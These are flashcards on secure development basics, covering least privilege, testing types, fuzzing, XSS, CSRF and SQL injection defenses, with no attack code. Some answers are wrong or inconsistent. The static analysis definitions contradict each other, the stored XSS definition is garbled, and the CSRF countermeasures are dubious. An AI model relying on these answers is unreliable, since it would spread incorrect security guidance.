Secure Development Flashcards

1
Q

What is Threat Modeling?

A

Threat modeling helps to prioritize vulnerability and patching throughout the software development lifecycle

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

When should security considerations be programmed into software?

A

At the very beginning of development

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is the concept of least privilege?

A

Users and processes should be given the least amount of access necessary to perform a function

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

What is defense in depth?

A

Layering of security controls

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Should you trust user input?

A

NO - all user input must be validated

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

How would you minimize the attack surface when developing software?

A

Reduce the amount of code necessary, eliminate unneeded functionality and require authentication prior to running additional plugins

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What is a secure default?

A

Default configurations on a program that are inherently secure rather than requiring an administrator to add in the additional security

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Why should developers use code signing?

A

For authenticity and integrity purposes

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What is meant by “Fail Securely?”

A

Applications should be coded to properly conduct error handling to fail securely instead of crashing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

What is black box testing?

A

When a tester is not provided with any information about the program prior to conducting the test

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

What is white box testing?

A

When a tester is given info about the program prior to testing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

What is gray box testing?

A

A mixture of white and black box where some info is given

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q
  • Testing
  • Integration
  • Planning and Analysis
  • Maintenance
  • Deployment
  • Software Design
  • Implementation

Put these steps of the software development cycle in the correct order….

A
  1. Planning and Analysis
  2. Software/Systems Design
  3. Implementation
  4. Testing
  5. Deployment
  6. Maintenance
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What is SEH in secure software development?

A

Structured Exception Handling - provides control over what the app should do when it handles an error

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

What is static analysis in SDLC?

A

Reviewing code manually without automatic tools and without running the program

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What is dynamic analysis in SDLC?

A

Analysis and testing of a program while executing or running it

17
Q

What is fuzzing in SDLC?

A

Injection of random data into a program in an attempt to find system failures and other weaknesses

18
Q

What is a back door?

A

Code placed in programs that bypasses normal authentication and security mechanisms

19
Q

What is arbitrary code execution?

A

When an attacker is able to execute or run commands on a victim’s computer

20
Q

What is RCE?

A

Remote code execution - attacker is able to execute commands remotely

21
Q

Explain stored/persistent XSS

A

An attempt to get data provided by the attacker stored on the web server by the victim

22
Q

Explain reflected XSS

A

When a malicious script is reflected off of a web application to the victim’s browser. The script is activated through a link, which sends a request to a website that enables execution of malicious scripts.

23
Q

Explain DOM-Based XSS

A

An attempt to exploit the victim’s web browswer

24
Q

What is XSRF?

A

Cross Site Request Forgery - when an attacker forces a user to execute actions on a server for which they are already authenticated

25
Q

How would you prevent XSRF?

A

Using session tokens, encryption, XML file scanning and cookie verification

26
Q

The process of removing redundant entries from a database is known as: sanitization or normalization

A

Normalization

27
Q

The process of removing redundant entries from a database is known as:

A

Normalization

28
Q

What are the countermeasures against SQL injection attacks?

A

Input Validation, Stored Procedures

29
Q

A type of redundant source code producing an output not used anywhere in the application is commonly referred to as

A

Dead Code

30
Q

What refers to the concept of virtualization on an application level?

A

Containerization

31
Q

What type of computing would be best suited for situations where response time in data processing is of critical importance?

A

Edge Computing

32
Q

The practice of finding vulnerabilities in an application by feeding it incorrect input is called:

A

Fuzzing

33
Q

What is an automated or manual code review process aimed at discovering logic and syntax errors in the application’s source code

A

Static Analysis